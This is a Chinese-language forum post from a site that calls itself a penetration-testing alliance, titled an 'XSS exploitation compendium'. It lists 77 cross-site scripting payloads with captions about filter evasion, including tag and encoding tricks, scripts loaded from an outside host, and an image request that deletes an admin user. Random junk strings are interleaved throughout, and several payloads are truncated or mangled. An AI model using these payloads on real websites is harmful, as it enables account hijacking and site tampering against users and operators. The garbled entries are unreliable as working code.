中国网络渗透测试联盟
标题:
xss详细利用大全1
[打印本页]
作者:
admin
时间:
2012-9-13 17:04
标题:
xss详细利用大全1
跨站图片shell
7 T. ^) k' p* o0 a' e4 S! Y
XSS跨站代码 <script>alert("")</script>
4 J/ Z3 F; @, U! v% P1 f8 b
( Y. O1 t- k7 c9 m5 n5 V# b# j
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
1 M5 K3 k4 W% b+ r2 ]3 v) F- H6 {
2 f2 d8 }5 z& ~9 d$ c4 B
T9 R! J2 ^/ {$ w. z2 N. V3 N
7 i% q6 f* E9 g: _! l; i7 Q
1)普通的XSS JavaScript注入
5 T) Z; K1 f% @1 I6 `7 I3 m
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 `' F0 g# ? _( g& R2 e( ~' ]( Y
( t4 B+ Q3 d! h% @' g2 z! k
(2)IMG标签XSS使用JavaScript命令
5 s$ V* N) X+ D) z1 E' \3 a! n
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& B: ^" Y5 B# Z1 D, r; t5 ]
, Q( e# N" c$ K' x3 X6 @( n+ \4 I
(3)IMG标签无分号无引号
. M+ V8 ^- p/ U
<IMG SRC=javascript:alert(‘XSS’)>
- w. U7 @ {+ {- y1 M0 c; p4 y
$ u# A) V3 l8 c
(4)IMG标签大小写不敏感
( q5 a; d4 i2 U1 T" e
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
) f1 S- l& Y) E! }4 O1 `0 E
o8 y: j1 k$ |7 f2 l
(5)HTML编码(必须有分号)
. w$ }2 X1 `0 ]; v- @" h- o1 r
<IMG SRC=javascript:alert(“XSS”)>
% {0 L5 @: `. Y& q& F$ R0 }
2 d ^2 W% K4 {5 ~
(6)修正缺陷IMG标签
- k6 Y% u9 o# ?1 d6 n
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
( J$ B, x! w+ H
% S- e( J& Y: r
(7)formCharCode标签(计算器)
9 a* ]8 F$ z3 l9 V8 v* S
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 d) U" N4 Q5 k4 r
* g u, ^+ F c
(8)UTF-8的Unicode编码(计算器)
) S1 S4 g; u6 J$ X9 ]8 a" ^
<IMG SRC=jav..省略..S')>
8 L0 `/ _2 ?* A& v' b: s% }6 m
$ I3 R# o T9 W5 _
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
5 w9 m$ _; `1 |
<IMG SRC=jav..省略..S')>
5 t8 Q) f# Q' K; P
1 k: F( I' W o* N
(10)十六进制编码也是没有分号(计算器)
$ }/ f' U3 Y. m+ j- R2 M
<IMG SRC=java..省略..XSS')>
. `( X |- w3 w9 o
G- z6 Y: q7 E8 |4 c
(11)嵌入式标签,将Javascript分开
4 U; ~! x( l8 |2 T9 c7 K/ r
<IMG SRC=”jav ascript:alert(‘XSS’);”>
) U$ N6 b4 d" a
! O/ G* Y% H0 b# u7 ?9 b! \9 U
(12)嵌入式编码标签,将Javascript分开
h' S& Q, p# [1 Z/ p7 B
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 E& j! q7 l1 N# f7 N
0 Y" j; p) N2 i5 V
(13)嵌入式换行符
7 ^& q0 \5 q( [& P
<IMG SRC=”jav ascript:alert(‘XSS’);”>
* U6 Y0 ^- y$ E: \/ h) L6 w
/ L% N& U) H$ B- c7 V7 X
(14)嵌入式回车
) P3 U- S: r2 A
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 {/ N3 w1 S8 m1 L
+ o7 o/ x4 ^) N# E4 M. M% f6 Q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
4 J% b5 }( L7 X z
<IMG SRC=”javascript:alert(‘XSS‘)”>
V* s' O+ j1 f) \
% C- t. ^; `" g M: K+ n6 j
(16)解决限制字符(要求同页面)
6 p3 G. x& f- z- k$ T O. Q
<script>z=’document.’</script>
! j- e4 f9 ~8 ~" \0 I E+ m
<script>z=z+’write(“‘</script>
O) t+ A- Y: a2 j1 a& | p4 Y/ g% F1 A
<script>z=z+’<script’</script>
- `4 B$ o2 R/ C! F3 s$ ]/ T6 g
<script>z=z+’ src=ht’</script>
: _- v, D* v0 y# I1 ^8 j: L+ F* @2 E: d
<script>z=z+’tp://ww’</script>
2 ]: {0 u+ i+ f. f- F6 K4 \) v; h
<script>z=z+’w.shell’</script>
' N+ {( O' @+ \5 A2 u% W1 x
<script>z=z+’.net/1.’</script>
9 [# b# E! V* O- M
<script>z=z+’js></sc’</script>
9 L0 M- s5 p% a
<script>z=z+’ript>”)’</script>
1 D4 V- E/ G" o
<script>eval_r(z)</script>
: d. N& T/ R+ G! S8 Y
! U C9 R, u/ p6 }
(17)空字符
! h% ~8 ^3 y8 n2 j" z, M Q
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
# R5 Q* R6 {, O, F; c4 S
( t# Z7 f6 W1 o9 o1 {9 f
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
) B3 v y; `4 x" @4 D [6 D
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 I, r5 Q( b6 }0 R
6 P2 m4 E' N/ N8 X3 p9 O
(19)Spaces和meta前的IMG标签
6 {* f1 i3 V% O7 G& e5 [
<IMG SRC=” javascript:alert(‘XSS’);”>
8 q7 t% A, ^: q0 Y6 |7 |) J9 m1 L
8 Y' C' c( u0 p
(20)Non-alpha-non-digit XSS
$ G# r9 {/ @7 `8 ~5 w- b2 y6 ]
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
. K& u+ p; d1 p. W9 d
& f( c/ \. w5 |* M' h, U
(21)Non-alpha-non-digit XSS to 2
1 Z) h+ O6 D* ]' J
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
1 {0 r0 K7 n. b6 i2 C$ N K \# b
. A# f; m7 v( H; e+ O! Y4 U4 g0 D3 e
(22)Non-alpha-non-digit XSS to 3
- n% M/ `0 r Y$ w% v+ |+ c
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
# o( R7 ~$ w2 j+ |- z M* @0 \2 V
" Z" Y5 z. o: W$ k% M
(23)双开括号
6 I7 H( J; c. E( O1 r7 C4 w: A
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
" ^. B t- f, t3 F# Z# r
0 b. Y, B! \) Y( a- z
(24)无结束脚本标记(仅火狐等浏览器)
' r% p$ S# ?0 R* I5 P. h0 ?' F+ y
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
. X! ^! ^, G5 T; L, v7 m _
1 Z% A! {4 A- [ M0 a
(25)无结束脚本标记2
# z* A+ m# a3 G6 T3 Z. G
<SCRIPT SRC=//3w.org/XSS/xss.js>
; x" Q t- |: [% W6 N! _
! g, T8 H' u" m2 P0 R5 X, Q; n
(26)半开的HTML/JavaScript XSS
* v) T+ v# q+ n) h9 \
<IMG SRC=”javascript:alert(‘XSS’)”
; f6 M# X2 k0 V' ?! l
0 @( @2 P( G! k& c3 ]
(27)双开角括号
7 h' g6 O" @; g6 q& X s3 X
<iframe src=http://3w.org/XSS.html <
6 @: n, J% a; `1 r' ?
& X. }, l9 O/ D" h. A
(28)无单引号 双引号 分号
4 _* H: w3 | o: b! c% h
<SCRIPT>a=/XSS/
& I' q; [( C S7 l5 u9 I
alert(a.source)</SCRIPT>
. Q. u/ B& B, R
: f* J" c2 E+ @9 C! f& i) K0 d
(29)换码过滤的JavaScript
# s; c" A: J3 t' V
\”;alert(‘XSS’);//
1 F! r5 o" Z" {, w2 Q5 B6 K
& C1 k3 j! b( ]% W
(30)结束Title标签
" f9 k9 z8 Z, _; H/ c; W( y3 n
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- R8 t; E& p+ p- N
. s3 N& p$ v+ ~5 p
(31)Input Image
9 C- x; X1 Q7 w& S6 H" b
<INPUT SRC=”javascript:alert(‘XSS’);”>
, d* @' |1 Y) i0 ~5 m; S [0 Z
% K; y) y& T: b8 i `8 W0 S
(32)BODY Image
" M( D; g p3 ~ G. h
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
7 D) O4 o6 l8 m
7 {; [! F2 v3 f/ @* L
(33)BODY标签
1 s! ^/ {' o4 O% o# m. {. `
<BODY(‘XSS’)>
0 o) `, z* h4 k0 V# H+ }
2 z5 G3 [/ ^0 m! P1 |, x
(34)IMG Dynsrc
9 P! I5 G8 T" Z& N
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
7 l; W% \3 V- g3 ?8 r4 T9 V! b
; p) ?! j. l& j$ o" X/ U5 C1 x5 w1 d
(35)IMG Lowsrc
0 A; \: O+ w; }
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
$ ]; t5 z. e. P' v& F
2 I' V4 i! `. U5 ]) o8 Q
(36)BGSOUND
6 b1 E P2 c( b- b4 _
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
& R) ^' a4 `9 o6 M! G
) n, M* {: p( B4 A2 }: C; |
(37)STYLE sheet
, |" H; Z* ]( X" h8 r: h- C: f
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 t/ Y, g0 g) f' M6 M
9 ]8 |; a9 G: l8 s0 K; h
(38)远程样式表
8 g7 n, _* O0 ?- b
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
5 h! b' v. n) i3 F1 Q8 [4 }
1 b3 L, S- O$ e$ h6 c6 ~8 u8 }
(39)List-style-image(列表式)
# x8 J5 }4 H' S+ f0 o
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; Z( a3 M! o# K3 y" V1 Q( \
& N9 C( F, E G" g
(40)IMG VBscript
4 q5 K/ O6 b% v/ V
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
. C+ Y4 g3 y! W4 T/ ~1 ? [7 B3 A3 m
# u! `, K, b# a* y/ s7 ?0 m
(41)META链接url
- e8 k \8 C+ F5 n* y
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
) o9 v8 f$ `$ k# O
% b& v4 N2 k: B, A2 l: F, P
(42)Iframe
: z8 |% C6 L" _( q0 |' c* Q9 L
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
" d# h' `. A6 l! L
(43)Frame
( s3 w7 b. n0 [) }
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
+ B- @1 d' g3 q) I! w2 k# [; |
# F: z# B6 N6 { K, S* G. C
(44)Table
3 g: J2 k1 A& ~( {0 K i+ X
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
. i7 D7 ?5 D( z- j! i* G% w3 W7 X
: k7 z9 R+ I) }; b4 C4 \% a3 j1 k$ ^4 {
(45)TD
( ^& b& Q( }0 Z
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
! @* N% f& t9 T' g- l2 j7 X
7 w( E3 ^2 }& |5 E+ M' Q
(46)DIV background-image
8 G6 p2 V8 T( T: N
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
$ i& D$ | h$ F$ \; |
: Z" E/ \% f4 W0 S
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
: k6 f# j' Y3 m/ x- C8 w
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
& i+ Y) r4 ?1 Z9 V, x. O% ^
: Q6 u, G% A% N% ^+ c5 F4 E4 o6 g
(48)DIV expression
2 o6 }- K' W, B
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
7 Z2 R1 r* x* ~ B
( X9 f& t0 @6 z. h, ]' l" p, V7 u9 t
(49)STYLE属性分拆表达
" m/ p' I( c% x
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ z# R; H2 {* E* b/ p
" \, ^& C/ x' \& }' Z
(50)匿名STYLE(组成:开角号和一个字母开头)
0 Z9 n6 {8 b& n% } N* a
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
& A; U0 e' n1 I4 [( {$ k8 U
, t( L0 Q& {1 k
(51)STYLE background-image
, I- @2 e' w+ |) S
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
% q1 t1 f; R% F* s9 V# V
' h8 j+ x: ]2 J: U3 z6 G7 C
(52)IMG STYLE方式
9 b' u* O% k' m+ X! j
exppression(alert(“XSS”))’>
7 y; M7 ^% Z6 ?' e6 O
, J. F8 B$ S: ]/ S
(53)STYLE background
9 H2 B! h8 {1 G" [# I
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ f! i, @* P t0 j" b0 a
0 ?. d% e+ J% z5 i& M x- e
(54)BASE
( n- C" A9 o% ?: u7 K
<BASE HREF=”javascript:alert(‘XSS’);//”>
% _# s( u7 u) `& b3 `
9 f) E# Z2 T0 t' a# i# x @
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
- R6 }1 A; K( o5 Q
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
+ }; x' Q. _8 d6 W+ \. m7 e
- X7 p4 B3 L- k4 z
(56)在flash中使用ActionScrpt可以混进你XSS的代码
4 Y1 J' p. } {" Q6 k( r6 Z
a=”get”;
$ J( N' _* O4 Y6 m
b=”URL(\”";
( p. T' `" E/ M `6 Q1 }
c=”javascript:”;
: o0 t E, y+ ]& j
d=”alert(‘XSS’);\”)”;
2 N9 x" P4 L% h8 v4 p! ]
eval_r(a+b+c+d);
% X* ~- l, ~* |3 a5 v# H
8 H: e. g" T( {+ A' y
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
" m" u! [: \3 |* U
<HTML xmlns:xss>
" e$ {% M3 k, E5 X: p0 w3 O' J
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
r2 |/ x" Z7 k% L# J5 z
<xss:xss>XSS</xss:xss>
8 z( ~2 @2 h0 G K. W8 x
</HTML>
% h g7 } S9 A( d7 k. w$ g+ k
+ O; w& p& i, y
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
7 e/ |% j+ e/ l) |( s! O+ M n
<SCRIPT SRC=””></SCRIPT>
* U/ w5 p3 G( T) P+ W
6 i) _8 O1 R/ `3 M
(59)IMG嵌入式命令,可执行任意命令
# @0 x& o$ P p6 }
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
0 C5 U- I* e7 f3 Y9 c
# o% n+ M5 X5 H o
(60)IMG嵌入式命令(a.jpg在同服务器)
: i4 ~' t) _, Z* s) `! P
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
# i. i8 ~6 g A! |
% ~: v. k! P; l$ c- V
(61)绕符号过滤
$ x6 B4 y: o; a5 j' y4 X
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
2 x! j2 ~3 {+ p! a# s
6 U( y' D8 z6 j
(62)
% U0 O) r( Y D; T6 r. {
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
% k' r0 @7 P7 E/ o
|( X/ ~7 T: w* H& p3 D( z- E
(63)
0 [) s( U1 A5 P& w9 o# n3 Q
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
0 W0 X- D" a- l) k5 c" D% H" Y
' }! X# J2 y0 |$ T
(64)
# o4 Z! q2 o# T" N: l3 Q! C
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
! w+ l4 _8 J' f2 C; G+ w }
) J8 S+ s$ r% Z1 P7 q
(65)
( ], b O$ R2 }5 g
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
7 ^+ i- }7 ^6 |" J6 o$ {1 z" q5 g, c
+ j+ Q" g; e$ g
(66)
5 ?& u+ q! Y* w Y9 O; I* c
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
* {6 B. T) R3 n/ w
% U* P% @0 x- J, V5 N2 s# f" v
(67)
+ n) v6 o# P0 u. `* D8 [
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”></SCRIPT>
7 K7 y6 o6 h4 h. I$ H
3 J+ a2 L9 B' P) A/ W- P$ v
(68)URL绕行
+ z+ e! T- |; W4 u. k. J
<A HREF=”
http://127.0.0.1/
”>XSS</A>
/ ]- f% }2 P7 ?$ y4 f, |4 N
+ ~$ Z, L. }5 e/ O+ f' o! m
(69)URL编码
1 D) ^# u% R" }: i- N3 b# ?' d
<A HREF=”
http://3w.org
”>XSS</A>
6 [2 o }; u$ j: d/ g
6 ?. k/ p6 v' x
(70)IP十进制
, s0 K8 Y \, O) M$ G- G, t5 N& N% o: E
<A HREF=”http://3232235521″>XSS</A>
/ ?1 u9 @4 `9 w6 b9 h$ M4 I
5 H% K, ]/ \$ V# `( M
(71)IP十六进制
5 e3 q: H, m ^% J9 r5 S
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
! @8 M5 b. U% B/ j
- O- m5 Y/ J2 o) F8 v
(72)IP八进制
3 d. e6 e2 \# F
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
0 W: R) }4 G- C: y
) K8 B9 N( G# J0 W
(73)混合编码
: M% Z( _8 f2 @" t$ r4 L
<A HREF=”h
2 q' a+ F. N# h. `
tt p://6 6.000146.0×7.147/”">XSS</A>
9 }/ n; |' O4 Z7 T9 q
3 T! w/ l. X- y/ y
(74)节省[http:]
1 ~- _/ v7 U- o q+ X
<A HREF=”//www.google.com/”>XSS</A>
- F: s! D6 D! o9 W
& {( v, g: v q' D
(75)节省[www]
* v) e& l( Q/ R2 b4 A0 A; ^8 ?4 \
<A HREF=”
http://google.com/
”>XSS</A>
6 z( E% I1 Y+ r* u
( n5 s4 g; M" ^3 h O
(76)绝对点绝对DNS
% T7 s0 w* m4 M4 O+ j
<A HREF=”
http://www.google.com./
”>XSS</A>
; Y0 u8 e' Q& U5 Y
$ d( b' p4 R6 d! t& u5 [0 i# p
(77)javascript链接
8 X/ \' C8 Y( A/ S" c8 u
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
0 a% c: |3 y) m* \+ q
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2